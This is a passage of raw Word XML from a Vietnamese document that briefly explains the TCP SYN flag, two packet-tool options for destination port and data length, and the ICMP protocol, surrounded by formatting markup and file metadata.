      <w:r w:rsidRPr="002F4B32">
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="777777"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> SYN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="777777"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="C0A154"/>
        </w:rPr>
        <w:t>cờ SYN được sử dụng để khởi tạo quá trình bắt tay 3 bước trong TCP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="428CAE69" w14:textId="77777777" w:rsidR="002F4B32" w:rsidRPr="002F4B32" w:rsidRDefault="002F4B32" w:rsidP="002F4B32">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="75" w:line="240" w:lineRule="auto"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="777777"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F4B32">
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="777777"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-p –</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002F4B32">
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="777777"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>destport</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002F4B32">
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="777777"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> [+] [+] </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002F4B32">
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="777777"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>vị</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002F4B32">
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="777777"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002F4B32">
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="777777"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>trí</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002F4B32">
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="777777"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002F4B32">
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="777777"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>đích</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002F4B32">
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="777777"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002F4B32">
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="777777"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>mặc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002F4B32">
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="777777"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002F4B32">
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="777777"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>định</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002F4B32">
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="777777"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 0) ctrl + z </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002F4B32">
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="777777"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>inc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002F4B32">
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="777777"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> / dec</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A913657" w14:textId="77777777" w:rsidR="00506D19" w:rsidRPr="00506D19" w:rsidRDefault="00506D19" w:rsidP="00506D19">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="75" w:line="240" w:lineRule="auto"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="777777"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00506D19">
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="777777"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">-d: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00506D19">
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="777777"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Độ</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dài</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của</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00506D19">
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="777777"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> tin </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00506D19">
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="777777"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nhắn</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mà</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chúng</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00506D19">
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="777777"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> ta </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00506D19">
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="777777"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sẽ</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nhập</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trong</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trường</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hợp</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này</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00506D19">
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="777777"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00506D19">
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="777777"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>là</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00506D19">
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="777777"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 50.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70769946" w14:textId="77777777" w:rsidR="00B05493" w:rsidRPr="00B05493" w:rsidRDefault="00B05493">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="202124"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="161D96C5" w14:textId="53577DB3" w:rsidR="00B05493" w:rsidRPr="00B05493" w:rsidRDefault="00B05493">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="202124"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>ICMP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="202124"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> (Internet Control Message Protocol) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="202124"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>là</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="202124"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> một giao thức báo cáo lỗi, thông báo cho sender biết việc gửi data đi có vấn đề, cũng giống như bộ định tuyến sử dụng để tạo thông báo lỗi đến địa chỉ IP nguồn khi các sự cố mạng ngăn chặn việc phân phối các IP packages.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00B05493" w:rsidRPr="00B0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77E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="68CE1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C2AB2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="691CC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B46C6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="AB22B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85938"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="042A1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E3126"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5F141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D3E9D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9118D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73BB5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A85097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67"/>
    <w:rsid w:val="002F4B32"/>
    <w:rsid w:val="004E2967"/>
    <w:rsid w:val="00506D19"/>
    <w:rsid w:val="00616824"/>
    <w:rsid w:val="00A474D2"/>
    <w:rsid w:val="00B05493"/>
    <w:rsid w:val="00F251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78F4"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{231BD6AC-C36C-48CC-B91C-C25329E0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54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3131">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1079329772">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1151365534">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1388380310">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1516842783">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1763262631">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="19479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igic.com/vi/tag/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Đỗ</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Nguyễn Phương</cp:lastModifiedBy>
  <cp:revision>4</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-10-24T07:43:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-11-15T20:01:00Z</dcterms:modified>
</cp:coreProperties>
</file>